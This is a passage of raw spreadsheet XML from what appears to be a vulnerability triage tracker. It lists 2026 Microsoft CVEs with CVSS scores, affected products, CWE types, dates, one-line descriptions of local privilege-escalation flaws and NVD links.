t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q564" s="5" t="inlineStr" /><c r="R564" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S564" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t></is></c></row><row r="565"><c r="A565" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B565" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C565" s="5" t="inlineStr"><is><t>CVE-2026-69787</t></is></c><c r="D565" s="5" t="n"><v>7.8</v></c><c r="E565" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F565" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G565" s="5" t="inlineStr" /><c r="H565" s="5" t="n"><v>0.003</v></c><c r="I565" s="5" t="inlineStr" /><c r="J565" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K56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65" s="5" t="inlineStr" /><c r="M565" s="5" t="inlineStr" /><c r="N565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P565" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q565" s="5" t="inlineStr" /><c r="R565" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S565" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t></is></c></row><row r="566"><c r="A566" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B566" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C566" s="5" t="inlineStr"><is><t>CVE-2026-69790</t></is></c><c r="D566" s="5" t="n"><v>7.8</v></c><c r="E566" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F566" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G566" s="5" t="inlineStr" /><c r="H566" s="5" t="n"><v>0.003</v></c><c r="I566" s="5" t="inlineStr" /><c r="J566" s="5" t="inlineStr" /><c r="K566" s="5" t="inlineStr" /><c r="L566" s="5" t="inlineStr" /><c r="M566" s="5" t="inlineStr" /><c r="N566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P566" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q566" s="5" t="inlineStr" /><c r="R566" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S566" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t></is></c></row><row r="567"><c r="A567" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B567" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C567" s="5" t="inlineStr"><is><t>CVE-2026-69799</t></is></c><c r="D567" s="5" t="n"><v>7.8</v></c><c r="E567" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F567" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G567" s="5" t="inlineStr" /><c r="H567" s="5" t="n"><v>0.002</v></c><c r="I567" s="5" t="inlineStr" /><c r="J567" s="5" t="inlineStr" /><c r="K567" s="5" t="inlineStr" /><c r="L567" s="5" t="inlineStr" /><c r="M567" s="5" t="inlineStr" /><c r="N567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P567" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q567" s="5" t="inlineStr" /><c r="R567" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S567" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t></is></c></row><row r="568"><c r="A568" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B568" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C568" s="5" t="inlineStr"><is><t>CVE-2026-69801</t></is></c><c r="D568" s="5" t="n"><v>7.8</v></c><c r="E568" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F568" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G568" s="5" t="inlineStr" /><c r="H568" s="5" t="n"><v>0.003</v></c><c r="I568" s="5" t="inlineStr" /><c r="J568" s="5" t="inlineStr" /><c r="K568" s="5" t="inlineStr" /><c r="L568" s="5" t="inlineStr" /><c r="M568" s="5" t="inlineStr" /><c r="N568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P568" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q568" s="5" t="inlineStr" /><c r="R568" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S568" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t></is></c></row><row r="569"><c r="A569" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B569" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C569" s="5" t="inlineStr"><is><t>CVE-2026-69821</t></is></c><c r="D569" s="5" t="n"><v>7.8</v></c><c r="E569" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F569" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G569" s="5" t="inlineStr" /><c r="H569" s="5" t="n"><v>0.003</v></c><c r="I569" s="5" t="inlineStr" /><c r="J569" s="5" t="inlineStr" /><c r="K569" s="5" t="inlineStr" /><c r="L569" s="5" t="inlineStr" /><c r="M569" s="5" t="inlineStr" /><c r="N569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P569" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q569" s="5" t="inlineStr" /><c r="R569" s="5" t="inlineStr"><is><t>CWE-116</t></is></c><c r="S569" s="5" t="inlineStr"><is><t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t></is></c></row><row r="570"><c r="A570" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B570" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C570" s="5" t="inlineStr"><is><t>CVE-2026-69822</t></is></c><c r="D570" s="5" t="n"><v>7.8</v></c><c r="E570" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F570" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G570" s="5" t="inlineStr" /><c r="H570" s="5" t="n"><v>0.003</v></c><c r="I570" s="5" t="inlineStr" /><c r="J570" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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570" s="5" t="inlineStr" /><c r="M570" s="5" t="inlineStr" /><c r="N570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P570" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q570" s="5" t="inlineStr" /><c r="R570" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S570" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t></is></c></row><row r="571"><c r="A571" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B571" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C571" s="5" t="inlineStr"><is><t>CVE-2026-69841</t></is></c><c r="D571" s="5" t="n"><v>7.8</v></c><c r="E571" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F571" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G571" s="5" t="inlineStr" /><c r="H571" s="5" t="n"><v>0.003</v></c><c r="I571" s="5" t="inlineStr" /><c r="J571" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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1" s="5" t="inlineStr" /><c r="M571" s="5" t="inlineStr" /><c r="N571" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P571" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q571" s="5" t="inlineStr" /><c r="R571" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S571" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t></is></c></row><row r="572"><c r="A572" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B572" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C572" s="5" t="inlineStr"><is><t>CVE-2026-69844</t></is></c><c r="D572" s="5" t="n"><v>7.8</v></c><c r="E572" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F572" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G572" s="5" t="inlineStr" /><c r="H572" s="5" t="n"><v>0.003</v></c><c r="I572" s="5" t="inlineStr" /><c r="J572" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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2" s="5" t="inlineStr" /><c r="M572" s="5" t="inlineStr" /><c r="N572" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P572" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q572" s="5" t="inlineStr" /><c r="R572" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S572" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T572" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t></is></c></row><row r="573"><c r="A573" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B573" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C573" s="5" t="inlineStr"><is><t>CVE-2026-69864</t></is></c><c r="D573" s="5" t="n"><v>7.8</v></c><c r="E573" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F573" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G573" s="5" t="inlineStr" /><c r="H573" s="5" t="n"><v>0.002</v></c><c r="I573" s="5" t="inlineStr" /><c r="J573" s="5" t="inlineStr" /><c r="K573" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L573" s="5" t="inlineStr" /><c r="M573" s="5" t="inlineStr" /><c r="N573" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P573" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q573" s="5" t="inlineStr" /><c r="R573" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S573" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t></is></c></row><row r="574"><c r="A574" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C574" s="5" t="inlineStr"><is><t>CVE-2026-69900</t></is></c><c r="D574" s="5" t="n"><v>7.8</v></c><c r="E574" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F574" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G574" s="5" t="inlineStr" /><c r="H574" s="5" t="n"><v>0.003</v></c><c r="I574" s="5" t="inlineStr" /><c r="J574" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K574" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L574" s="5" t="inlineStr" /><c r="M574" s="5" t="inlineStr" /><c r="N574" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P574" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q574" s="5" t="inlineStr" /><c r="R574" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S574" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t></is></c></row><row r="575"><c r="A575" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C575" s="5" t="inlineStr"><is><t>CVE-2026-69907</t></is></c><c r="D575" s="5" t="n"><v>7.8</v></c><c r="E575" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F575" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G575" s="5" t="inlineStr" /><c r="H575" s="5" t="n"><v>0.003</v></c><c r="I575" s="5" t="inlineStr" /><c r="J575" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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75" s="5" t="inlineStr" /><c r="M575" s="5" t="inlineStr" /><c r="N575" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P575" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q575" s="5" t="inlineStr" /><c r="R575" s="5" t="inlineStr"><is><t>CWE-280</t></is></c><c r="S575" s="5" t="inlineStr"><is><t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t></is></c></row><row r="576"><c r="A576" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B576" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C576" s="5" t="inlineStr"><is><t>CVE-2026-69921</t></is></c><c r="D576" s="5" t="n"><v>7.8</v></c><c r="E576" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F576" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G576" s="5" t="inlineStr" /><c r="H576" s="5" t="n"><v>0.003</v></c><c r="I576" s="5" t="inlineStr" /><c r="J576" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K576" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L576" s="5" t="inlineStr" /><c r="M576" s="5" t="inlineStr" /><c r="N576" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P576" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q576" s="5" t="inlineStr" /><c r="R576" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S576" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t></is></c></row><row r="577"><c r="A577" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C577" s="5" t="inlineStr"><is><t>CVE-2026-70289</t></is></c><c r="D577" s="5" t="n"><v>7.8</v></c><c r="E577" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F577" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G577" s="5" t="inlineStr" /><c r="H577" s="5" t="n"><v>0.003</v></c><c r="I577" s="5" t="inlineStr" /><c r="J577" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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7" s="5" t="inlineStr" /><c r="M577" s="5" t="inlineStr" /><c r="N577" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P577" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q577" s="5" t="inlineStr" /><c r="R577" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S577" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T577" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t></is></c></row><row r="578"><c r="A578" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C578" s="5" t="inlineStr"><is><t>CVE-2026-70334</t></is></c><c r="D578" s="5" t="n"><v>7.8</v></c><c r="E578" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F578" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G578" s="5" t="inlineStr" /><c r="H578" s="5" t="n"><v>0.004</v></c><c r="I578" s="5" t="inlineStr" /><c r="J578" s="5" t="inlineStr" /><c r="K578" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L578" s="5" t="inlineStr" /><c r="M578" s="5" t="inlineStr" /><c r="N578" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P578" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q578" s="5" t="inlineStr" /><c r="R578" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S578" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t></is></c><c r="T578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t></is></c></row><row r="579"><c r="A579" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B579" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C579" s="5" t="inlineStr"><is><t>CVE-2026-70564</t></is></c><c r="D579" s="5" t="n"><v>7.8</v></c><c r="E579" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F579" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G579" s="5" t="inlineStr" /><c r="H579" s="5" t="n"><v>0.003</v></c><c r="I579" s="5" t="inlineStr" /><c r="J579" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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9" s="5" t="inlineStr" /><c r="M579" s="5" t="inlineStr" /><c r="N579" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P579" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q579" s="5" t="inlineStr" /><c r="R579" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S579" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T579" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t></is></c></row><row r="580"><c r="A580" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B580" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C580" s="5" t="inlineStr"><is><t>CVE-2026-70569</t></is></c><c r="D580" s="5" t="n"><v>7.8</v></c><c r="E580" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F580" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G580" s="5" t="inlineStr" /><c r="H580" s="5" t="n"><v>0.003</v></c><c r="I580" s="5" t="inlineStr" /><c r="J580" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K580" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L580" s="5" t="inlineStr" /><c r="M580" s="5" t="inlineStr" /><c r="N580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P580" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q580" s="5" t="inlineStr" /><c r="R580" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S580" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t></is></c></row><row r="581"><c r="A581" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B581" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C581" s="5" t="inlineStr"><is><t>CVE-2026-70572</t></is></c><c r="D581" s="5" t="n"><v>7.8</v></c><c r="E581" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F581" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G581" s="5" t="inlineStr" /><c r="H581" s="5" t="n"><v>0.003</v></c><c r="I581" s="5" t="inlineStr" /><c r="J581" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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81" s="5" t="inlineStr" /><c r="M581" s="5" t="inlineStr" /><c r="N581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P581" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q581" s="5" t="inlineStr" /><c r="R581" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S581" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t></is></c></row><row r="582"><c r="A582" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B582" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C582" s="5" t="inlineStr"><is><t>CVE-2026-70574</t></is></c><c r="D582" s="5" t="n"><v>7.8</v></c><c r="E582" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F582" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G582" s="5" t="inlineStr" /><c r="H582" s="5" t="n"><v>0.003</v></c><c r="I582" s="5" t="inlineStr" /><c r="J582" s="5" t="inlineStr" /><c r="K582" s="5" t="inlineStr" /><c r="L582" s="5" t="inlineStr" /><c r="M582" s="5" t="inlineStr" /><c r="N582" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P582" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q582" s="5" t="inlineStr" /><c r="R582" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S582" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t></is></c></row><row r="583"><c r="A583" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B583" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C583" s="5" t="inlineStr"><is><t>CVE-2026-70581</t></is></c><c r="D583" s="5" t="n"><v>7.8</v></c><c r="E583" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F583" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G583" s="5" t="inlineStr" /><c r="H583" s="5" t="n"><v>0.003</v></c><c r="I583" s="5" t="inlineStr" /><c r="J583" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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83" s="5" t="inlineStr" /><c r="M583" s="5" t="inlineStr" /><c r="N583" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O583" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P583" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q583" s="5" t="inlineStr" /><c r="R583" s="5" t="inlineStr"><is><t>CWE-190, CWE-20</t></is></c><c r="S583" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t></is></c></row><row r="584"><c r="A584" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C584" s="5" t="inlineStr"><is><t>CVE-2026-70583</t></is></c><c r="D584" s="5" t="n"><v>7.8</v></c><c r="E584" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F584" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G584" s="5" t="inlineStr" /><c r="H584" s="5" t="n"><v>0.003</v></c><c r="I584" s="5" t="inlineStr" /><c r="J584" s="5" t="inlineStr" /><c r="K584" s="5" t="inlineStr" /><c r="L584" s="5" t="inlineStr" /><c r="M584" s="5" t="inlineStr" /><c r="N584" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P584" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q584" s="5" t="inlineStr" /><c r="R584" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S584" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t></is></c></row><row r="585"><c r="A585" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B585" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C585" s="5" t="inlineStr"><is><t>CVE-2026-70584</t></is></c><c r="D585" s="5" t="n"><v>7.8</v></c><c r="E585" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F585" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G585" s="5" t="inlineStr" /><c r="H585" s="5" t="n"><v>0.003</v></c><c r="I585" s="5" t="inlineStr" /><c r="J585" s="5" t="inlineStr" /><c r="K585" s="5" t="inlineStr" /><c r="L585" s="5" t="inlineStr" /><c r="M585" s="5" t="inlineStr" /><c r="N585" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O585" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P585" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q585" s="5" t="inlineStr" /><c r="R585" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S585" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t></is></c></row><row r="586"><c r="A586" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B586" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C586" s="5" t="inlineStr"><is><t>CVE-2026-71334</t></is></c><c r="D586" s="5" t="n"><v>7.8</v></c><c r="E586" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F586" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G586" s="5" t="inlineStr" /><c r="H586" s="5" t="n"><v>0.002</v></c><c r="I586" s="5" t="inlineStr" /><c r="J586" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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6" s="5" t="inlineStr" /><c r="M586" s="5" t="inlineStr" /><c r="N586" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O586" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P586" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q586" s="5" t="inlineStr" /><c r="R586" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S586" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T586" s="6" 